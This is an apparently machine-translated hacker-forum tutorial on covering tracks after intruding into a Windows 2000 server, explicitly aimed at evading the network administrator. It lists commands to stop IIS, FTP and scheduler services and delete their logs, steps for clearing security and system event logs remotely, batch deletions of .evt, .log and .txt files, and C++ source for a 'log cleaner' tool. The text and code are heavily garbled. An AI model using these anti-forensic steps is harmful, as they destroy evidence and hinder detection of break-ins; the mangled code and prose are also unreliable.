Xiao Yan's Cleaniislog is a nice log clearance tool. But unfortunately, you can only clear the IIS log, the log files to be generated by the FTP and Shedule, we generally only be cleared manually.
Windows2000 log files typically have application logs, security logs, system logs, DNS server logs, FTP logs, WWW logs, etc., which may be different depending on the service enabled by the server.
The general steps are as follows: 1. Clear the log of IIS. Don't underestimate the log function of IIS, it can record your invasion process, such as the command that IE in IE when you use the Unicode invading, and the traces left when scanning the 80-port. You may not be paying attention to it, but it is stared by the network management, maybe it will be ....... Haha, we can manually remove it. 1. The default location of the log:% systemroot% / system32 / logfiles / w3svc1 /, The default a log there, let's switch to this directory. DEL *. * You probably want to be safe, then DIR, today's log, don't panic. Because the W3SVC service is still open, how can we clear this log file? Method 1: If there is 3389 can log in, then open with notepad, turn Ctrl A and then Del. Method 2: NET Commands C: /> Net Stop W3SVC World Wide Web Publishing Service service is stopping. (May wait for a long time, may not be successful) World Wide Web Publishing Service service has been successfully stopped. Well, W3SVC stopped, we can empty it, del *. * Don't forget to open W3SVC services C: /> NET START W3SVC 2. Clear the FTP log. FTP log default location:% systemroot% / sys tem32 / logfiles / msftpsvc1 /, default a log clearance method with the same version 3. Clear Scheduler log SCHEDULER service log default location:% systemroot% / schedlgu.txt clear method: Application log , Security log, system log, DNS log default location:% systemroot% / sys tem32 / config cleaning method I not pay attention to the above three directories may not be above, because the modification of the administrator can read the registry value to get them the location for the application logs, security logs, system log, DNS server log, which these lOG files in the registry: HKEY_LOCAL_MACHINE / sys tem / CurrentControlSet / services / Eventlog Schedluler service log in the registry HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / SchedulingAgent
5. I borrowed from other people's articles (in fact, copying) OK! Congratulations, now a simple log has been successfully deleted. Here is a difficult security log and system log, guarding these logs is Event log, trying to stop it! D: / Server / Sys Tem32 / Logfiles / W3SVC1> Net Stop EventLog This service cannot accept the "Pause" or "Stop" operation of the request. Kao, I service U, no way, it is a key service. If you do not need a third-party tool, you don't delete the security log and system log at all on the command line! So, it is still necessary to use a simple but speed slow crash. Open "Event Viewer" in the "Management Tool" of "Control Panel" (98 is not, know the benefits of Win2K), "Operation" in the menu The item has a menu named "Connect to another computer", click on it as shown below: Enter the IP of the remote computer, then click on the smoke, wait for dozens of minutes, endure the torture of the crash, then open the picture below :
Select the security log of the remote computer, right click to select its properties:
Click the "Clear Log" button in the properties, OK! The safety log is clear! The same endurance pain to clear the system log!
6. Most of the important logs above you have been cleared. Then you have to do it, there is still an omission. That do this, some of Del below /winnt/*.log system32 /logfiles/*.* /dtclog/*.* /config/*.evt /*.log /*.txt
So far, most of the logs I have learned, we have chopped the way you cleared, then you learned to use it, you have seen the process of clearing all the logs, is it very busy, manual is spent A lot of time. Sometimes it is not necessarily clear. That is the programmed friend, it will think, I can program, I am afraid. You have already understood, to clear some logs, first to close some service programs, I will teach you how to write a DOS gadget that can look at the machine, and the specific implementation looks at my previous article "If you do a DOS Sergers Viewer "Tool Name SerName.exe Run sername.exe, sername.exe -t 1 -t 1 huh, all machines are running the service program is displayed. Remember the name of the service program you want to close, it will be useful below.
The second step of the programming is that the implementation of the W3SVC and Shedule also have a service program such as FTP. The code I wrote is slowly watching MSDN as follows. (It's not difficult, there is something that you don't understand, don't come to ask me)
void StopServices (LPCTSTR lpServiceName) {SC_HANDLE scman = :: OpenSCManager (NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE); if (scman) {SC_HANDLE sh = :: OpenService (scman, lpServiceName, SERVICE_STOP); if (sh) {BOOL bControl; SERVICE_STATUS ServiceStatus ; bControl = ControlService (sh, SERVICE_CONTROL_STOP, & ServiceStatus); DWORD dwControl; if (bControl) {printf ( "success to stop the service /"% s / "/ n", lpServiceName);} else {dwControl = :: GetLastError ( ); tch (dwControl) {case ERROR_ACCESS_DENIED: printf ( "The specified handle was not opened with the necessary access./n");break; case ERROR_SERVICE_NOT_ACTIVE: printf (" The service has not been started./n");break ; case ERROR_DEPENDENT_SERVICES_RUNNING: printf ( "The service can not be stopped because other running services are dependent on it./n");break; case ERROR_INVALID_SERVICE_CONTROL: printf (" The requested control code is not valid, or it is unacceptable to the service. / N "); Break; Case ER ROR_SERVICE_CANNOT_ACCEPT_CTRL: printf ( "The requested control code can not be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING./n");break; case ERROR_SERVICE_REQUEST_TIMEOUT: printf (" The service did not respond to the start Request in a Timely fashion./n" ":: closESERVICEHANDE (SH);} :: closeServiceHandle (SCMAN);
The function is, then write a main function. Void main () {StopServices ("W3SVC"); Return;}
OK. Success, if there is no success, please refer to the output error prompt. Ok, there is a function of the service program that can stop,
Then we also need a function that can turn on the service program. In fact, the above understands, the following code is just some small changes to the above code.
void StartServices (LPCTSTR lpServiceName) {SC_HANDLE scman = :: OpenSCManager (NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE); if (scman) {SC_HANDLE sh = :: OpenService (scman, lpServiceName, SERVICE_START); if (sh) {BOOL bControl; bControl = StartService (SH, 1, & LPSERVICENAME); DWORD DWCONTROL; if (bcontrol) {Printf ("Success to Start The Service /"% S / "/ N", LPServiceName);} else {dwcontrol = :: getLastError (); tch (dwControl) {case ERROR_ACCESS_DENIED: printf ( "The specified handle was not opened with SERVICE_START access./n");break; case ERROR_INVALID_HANDLE: printf (" The specified handle is invalid./n");break; case ERROR_PATH_NOT_FOUND: printf ( "The service binary file could not be found./n");break; case ERROR_SERVICE_ALREADY_RUNNING: printf (" An instance of the service is already running./n");break; case ERROR_SERVICE_DATABASE_LOCKED: printf ( "The database is locked ./n" "; Break; case error_service_dependency_deleted: Printf ("The Service Depends on a service that does not exist or has been marked for deletion./n");break; case ERROR_SERVICE_DEPENDENCY_FAIL: printf ( "The service depends on another service that has failed to start./n");break; case ERROR_SERVICE_DISABLED: printf ( "The service has been disabled./n");break; case ERROR_SERVICE_LOGON_FAILED: printf (" The service could not be logged on./n");break; case ERROR_SERVICE_MARKED_FOR_DELETE: printf ( "The service has been marked for deletion. / N "); Break; case error_service_no_thread: Printf (" a thread could not be create for the service./n" ";break; casser_service_request_timeout: printf ("
The Start Request in A Timely fashion./n" ":: ClosServiceHandle (SH); Return;
}
Just some small changes. Now you have this two weapons, the following is some knowledge of the first part of the top, go to the Del file, I don't want to teach, you must think about how to do it.
Now taught the third weapon again, although he can have no procedures for our procedures, but he is necessary for a beautiful program, which is a function of judging the status of the service.
My code is as follows.
DWORD GetServicesState (LPCTSTR lpServiceName) {DWORD dwState; SC_HANDLE scman = :: OpenSCManager (NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE); if (scman) {SC_HANDLE sh = :: OpenService (scman, lpServiceName, SERVICE_QUERY_STATUS); if (sh) {BOOL bQuery ; SERVICE_STATUS ServiceStatus; bQuery = QueryServiceStatus (sh, & ServiceStatus); if (bQuery!) {DWORD dwControl; dwControl = :: GetLastError (); tch (dwControl) {case ERROR_ACCESS_DENIED: printf ( "The specified handle was not opened with SERVICE_QUERY_STATUS access ./n" .; "The specified handle is invalid./n"";} dwstate = 0;} else {dwstate = service; }: ClosESERVICEHANDE (SCMAN); Return DwState;}
Well, everything is all, then complete the code. The other code is as follows. I hope that you will modify the source code in the specific situation of the system you invaded before running.
/ / =========================================================================================================================================================================================== ========== // // green soldier clearance log clearance log CLEANER1.0 // // compiled by http://www.vertarmy.com Green Corps /// http://vcghost.yeah.netの / (= ===================================================================== ======================================== // #include "windows.h" #include "stdio.h" Void StopServices LPCTSTR lpServiceName); void StartServices (LPCTSTR lpServiceName); DWORD GetServicesState (LPCTSTR lpServiceName); void DelFiles (LPCTSTR lpFileName, LPCTSTR lpDirectory); void Del3WFile (); void DelFtpFile (); void DelSheduleFile (); void DelOtherFile (); void showTitle (); void main (int Argc, char * argv []) {showtitle (); del3wfile (); DEL3WFILE (); DELFTPFILE (); DELSHEDULEFILE (); showtitle (); return;
void StopServices (LPCTSTR lpServiceName) {SC_HANDLE scman = :: OpenSCManager (NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE); if (scman) {SC_HANDLE sh = :: OpenService (scman, lpServiceName, SERVICE_STOP); if (sh) {BOOL bControl; SERVICE_STATUS ServiceStatus ; bControl = ControlService (sh, SERVICE_CONTROL_STOP, & ServiceStatus); DWORD dwControl; if (bControl) {printf ( "success to stop the service /"% s / "/ n", lpServiceName);} else {dwControl = :: GetLastError ( ); tch (dwControl) {case ERROR_ACCESS_DENIED: printf ( "The specified handle was not opened with the necessary access./n");break; case ERROR_SERVICE_NOT_ACTIVE: printf (" The service has not been started./n");break ; case ERROR_DEPENDENT_SERVICES_RUNNING: printf ( "The service can not be stopped because other running services are dependent on it./n");break; case ERROR_INVALID_SERVICE_CONTROL: printf (" The requested control code is not valid, or it is unacceptable to the service. / N "); Break; Case ER ROR_SERVICE_CANNOT_ACCEPT_CTRL: printf ( "The requested control code can not be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING./n");break; case ERROR_SERVICE_REQUEST_TIMEOUT: printf (" The service did not respond to the start Request in a Timely fashion./n" ":: closESERVICEHANDE (SH);} :: closeServiceHandle (SCMAN);
void StartServices (LPCTSTR lpServiceName) {SC_HANDLE scman = :: OpenSCManager (NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE); if (scman) {SC_HANDLE sh = :: OpenService (scman, lpServiceName, SERVICE_START); if (sh) {BOOL bControl; bControl = StartService (SH, 1, & LPSERVICENAME); DWORD DWCONTROL; if (bcontrol) {Printf ("Success to Start The Service /"% S / "/ N", LPServiceName);} else {dwcontrol = :: getLastError (); tch (dwControl) {case ERROR_ACCESS_DENIED: printf ( "The specified handle was not opened with SERVICE_START access./n");break; case ERROR_INVALID_HANDLE: printf (" The specified handle is invalid./n");break; case ERROR_PATH_NOT_FOUND: printf ( "The service binary file could not be found./n");break; case ERROR_SERVICE_ALREADY_RUNNING: printf (" An instance of the service is already running./n");break; case ERROR_SERVICE_DATABASE_LOCKED: printf ( "The database is locked ./n" "; Break; case error_service_dependency_deleted: Printf ("The Service Depends on a service that does not exist or has been marked for deletion./n");break; case ERROR_SERVICE_DEPENDENCY_FAIL: printf ( "The service depends on another service that has failed to start./n");break; case ERROR_SERVICE_DISABLED: printf ( "The service has been disabled./n");break; case ERROR_SERVICE_LOGON_FAILED: printf (" The service could not be logged on./n");break; case ERROR_SERVICE_MARKED_FOR_DELETE: printf ( "The service has been marked for deletion. / N "); Break; case error_service_no_thread: Printf (" a thread could not be create for the service./n" ";break; casser_service_request_timeout: printf ("
The Start Request in A Timely fashion./n" ":: ClosServiceHandle (SH); Return;
}
DWORD GetServicesState (LPCTSTR lpServiceName) {DWORD dwState; SC_HANDLE scman = :: OpenSCManager (NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE); if (scman) {SC_HANDLE sh = :: OpenService (scman, lpServiceName, SERVICE_QUERY_STATUS); if (sh) {BOOL bQuery ; SERVICE_STATUS ServiceStatus; bQuery = QueryServiceStatus (sh, & ServiceStatus); if (bQuery!) {DWORD dwControl; dwControl = :: GetLastError (); tch (dwControl) {case ERROR_ACCESS_DENIED: printf ( "The specified handle was not opened with SERVICE_QUERY_STATUS access ./n" .; "The specified handle is invalid./n"";} dwstate = 0;} else {dwstate = service; }: ClosESERVICEHANDE (SCMAN); Return DwState;}
void DelFiles (LPCTSTR lpFileName, LPCTSTR lpDirectory) {TCHAR tcFileName [1024]; HANDLE hFile; WIN32_FIND_DATA FindFileData; hFile = FindFirstFile (lpFileName, & FindFileData); if (hFile = INVALID_HANDLE_value!) {while (1) {lstrcpy (tcFileName, lpDirectory) LSTRCAT (TCFileName); Bool DDEL = Deletefile (TCFileName); if (DDEL) {Printf ("delete file /"% s / "sucps / n", tcFileName);} else {printf ("Delte File / "% s /" fail / n ", tcfilename);} if (! findnextfile (hfile, & findfileData) {Break;}}} findclose (hfile);
void Del3WFile () {TCHAR tcSystemDirectory [1024]; :: GetSystemDirectory (tcSystemDirectory, 1024); TCHAR tc3WDirectory [1024]; TCHAR tc3WFile [1024]; lstrcpy (tc3WDirectory, tcSystemDirectory); lstrcpy (tc3WFile, tcSystemDirectory); lstrcat (tc3WFile, "//logfiles//w3svc1//m.log"); lstrcat (tc3wdirectory, "// logfiles // w3svc1 /////////////////////// Logfiles // W3SVC1 / ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////> {StopServices ("W3SVC"); :: Sleep (1000); Delfiles (TC3WFILE, TC3WDIRECTORY); :: Sleep (1000); // Should consider using threadsSERVICES ("W3SVC");} else {Delfiles (TC3WFile, Tc3wDirectory );}} void DelFtpFile () {TCHAR tcSystemDirectory [1024]; :: GetSystemDirectory (tcSystemDirectory, 1024); TCHAR tcFtpDirectory [1024]; TCHAR tcFtpFile [1024]; lstrcpy (tcFtpDirectory, tcSystemDirectory); lstrcpy (tcFtpFile, tcSystemDirectory); LSTRCAT (TCFTPFILE, "// logfiles // msftpsvc1 /// *. log"); lstrcat (tcftpdirectory, "// logfiles // msftpsvc1 ///////////////////////////////////////////////////////////////////////////////////////////////> == Service_Running ) {StopServices ("MSFTPSVC"); :: Sleep (1000); DelFiles (TCFTPFILE, TCFTPDIRECTORY); :: Sleep (1000); // Should consider using thread STARTSERVICES ("MSFTPSVC");} else {DElfiles (tcftpfile, TCFTPDIRECTORY);
}
void DelSheduleFile () {TCHAR tcSystemDirectory [1024]; :: GetSystemDirectory (tcSystemDirectory, 1024); TCHAR tcScheduleFile [1024]; lstrcpy (tcScheduleFile, tcSystemDirectory); int iLength = lstrlen (tcScheduleFile); while (1) {iLength--; IF (tcschedulefile [inength] == '//') Break;} tcschedulefile [} tcschedulefile [@ }ent] = '/ 0'; lstrcat (tcschedulefile, "// schedlgu.txt"); dWord dwState; dwState = getServiceSstate ("schedule) ; If (dwstate == service_running) {StopServices ("Schedule"); :: Sleep (1000); Bool DDEL = Deletefile; if (ddel) {Printf ("delete file /"% s / "Success / N ", tcschedulefile);} else {printf (" delte file / "% s /" fail / n ", tcschedulefile;} // Delfiles (tcschedulefile, tcscheduledirectory); :: Sleep (1000); // should consider using threads StartServices ("schedule");} else {bool decile; if (ddel) {printf ("delete file /"% s / "sucps / n", tcschedulefile;} else {printf ("Delte File / "% s /" fail / n ", tcschedulefile;} // Delfiles (TCSC HEDULEFILE, TCSCHEDULECTORY);}}
void DelOtherFile () {TCHAR tcSystemDirectory [1024]; :: GetSystemDirectory (tcSystemDirectory, 1024); TCHAR tcOtherFile [1024]; TCHAR tcOtherDirectory [1024]; // delete all files under the logfiles lstrcpy (tcOtherFile, tcSystemDirectory); lstrcpy (tcOtherDirectory, tcSystemDirectory); lstrcat (tcOtherFile, "// logfiles //*.*"); lstrcat (tcOtherDirectory, "// logfiles //"); DelFiles (tcOtherFile, tcOtherDirectory); // delete all the files under dtclog lstrcpy (tcOtherFile, tcSystemDirectory); lstrcpy (tcOtherDirectory, tcSystemDirectory); lstrcat (tcOtherFile, "// dtclog //*.*"); lstrcat (tcOtherDirectory, "// dtclog //"); DelFiles (tcOtherFile, tcOtherDirectory); // delete the config all files under lstrcpy (tcOtherFile, tcSystemDirectory); lstrcpy (tcOtherDirectory, tcSystemDirectory); lstrcat (tcOtherFile, "// config //*.*"); lstrcat (tcOtherDirectory, "// config //"); DelFiles (tcOtherFile, tcOtherDirectory); // delete all log files under system32 lstrcpy (tcOtherFile, tcSystemDirectory); lstrcpy (tcOtherDirectory, tcSystemDirectory); lstrcat (tcOtherFile, "// * log."); lstrcat (tcOtherDirectory, "//"); D elFiles (tcOtherFile, tcOtherDirectory); // delete all the txt file lstrcpy (tcOtherFile, tcSystemDirectory) under system32; lstrcpy (tcOtherDirectory, tcSystemDirectory); lstrcat (tcOtherFile, ". // * txt"); lstrcat (tcOtherDirectory, "// "); DelFiles (tcOtherFile, tcOtherDirectory); // get / winnt / directory path TCHAR tcWinDirectory [1024]; lstrcpy (tcWinDirectory, tcSystemDirectory); int iLength = lstrlen (tcWinDirectory); while (1) {iLength--; if ( tcWinDirectory [iLength] == '//') break;} tcWinDirectory [iLength] = '/ 0'; // delete /winnt/*.log lstrcpy (tcOtherFile, tcWinDirectory); lstrcpy (tcOtherDirectory, tcWinDirectory); lstrcat (tcOtherFile , "// *. log");
lstrcat (tcOtherDirectory, "//"); DelFiles (tcOtherFile, tcOtherDirectory); // delete /winnt/*.txt lstrcpy (tcOtherFile, tcWinDirectory); lstrcpy (tcOtherDirectory, tcWinDirectory);. lstrcat (tcOtherFile, "// * txt "); lstrcat (tcotherdirectory," // "); DelFiles (Tcotherfile, TcotherDirectory);
}
Void showtitle () {printf ("=========================================== ================== / n "); Printf (" $ Green Bird Log Cleaner 1.0 $ / N "); Printf (" $ compiled by http: // www. Vertarmy.com Green Corps $ / N "); Printf (" $ http://vcghost.yeah.net) $ / n "); Printf (" $ tjhac @163.com $ / n ") PRINTF ("============================================================================================================================================================================== ============= / n ");}
(Transferred from black and white network)
Several cleaning logs for the last class
Del C: / Winnt / System32 / logfiles /*.* Del C: / WinNT / SSYTEM32 / Config / *. EVT DEL C: / WinNT / System32 / DTCLOG / *. - DEL C: / Winnt / System32 / *. log Del C: / Winnt / System32 / *. TXT DEL C: / WinNT / *. TXT DEL C: / WinNT / *. log
Note: The * represents all the meaning, for example: Del C: / Winnt / *. Log indicates that all .log is a file that extension in the C disk Winnt directory.
